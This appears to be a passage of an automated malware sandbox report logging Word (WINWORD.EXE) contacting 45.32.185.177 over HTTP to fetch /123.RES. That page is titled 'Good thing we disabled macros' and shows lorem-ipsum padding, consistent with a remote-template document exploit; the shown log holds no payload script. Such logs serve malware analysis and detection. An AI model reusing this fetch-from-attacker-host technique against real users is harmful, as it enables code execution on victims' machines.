Jun 7, 2022 17:33:45.563441038 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.563630104 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.563802004 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.720526934 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.728183031 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.728290081 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.771857023 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.794635057 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.794852018 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.794971943 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:48.150402069 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:48.150511026 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:48.151854038 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:48.175110102 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:50.505388021 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:50.505740881 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:50.505805016 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:50.529305935 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:50.797528028 CEST	80	49176	45.32.185.177	192.168.2.22

HTTP Request Dependency Graph

45.32.185.177

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	45.32.185.177	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 17:33:28.042892933 CEST	1	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 45.32.185.177 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 17:33:28.066274881 CEST	2	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:28 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	45.32.185.177	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 17:33:34.007536888 CEST	3	OUT	HEAD /123.RES HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 45.32.185.177
Jun 7, 2022 17:33:34.030771017 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:34 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
Jun 7, 2022 17:33:34.256355047 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:34 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49175	45.32.185.177	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 17:33:38.184900045 CEST	4	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 45.32.185.177
Jun 7, 2022 17:33:38.208200932 CEST	4	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:38 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
Jun 7, 2022 17:33:38.436250925 CEST	4	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:38 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
Jun 7, 2022 17:33:39.353693008 CEST	5	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:39 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:39.580319881 CEST	6	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:39 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:41.212960005 CEST	7	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:41 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:41.440367937 CEST	15	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:41 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:44.502847910 CEST	18	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:44 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:44.728271961 CEST	18	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:44 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:45.501329899 CEST	19	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:45 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
Jun 7, 2022 17:33:45.728183031 CEST	21	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 07 Jun 2022 15:33:45 GMT Server: Apache/2.4.48 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 304 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49176	45.32.185.177	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 17:33:41.273190975 CEST	8	OUT	GET /123.RES HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 45.32.185.177 Connection: Keep-Alive
Jun 7, 2022 17:33:41.296227932 CEST	9	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:41 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus m
Jun 7, 2022 17:33:42.952044010 CEST	15	OUT	HEAD /123.RES HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 45.32.185.177 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 17:33:42.975111008 CEST	16	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:42 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
Jun 7, 2022 17:33:45.540532112 CEST	20	OUT	GET /123.RES HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 45.32.185.177 If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT If-None-Match: "1701-5e0db72a43821" Connection: Keep-Alive
Jun 7, 2022 17:33:45.563630104 CEST	20	IN	HTTP/1.1 304 Not Modified Date: Tue, 07 Jun 2022 15:33:45 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
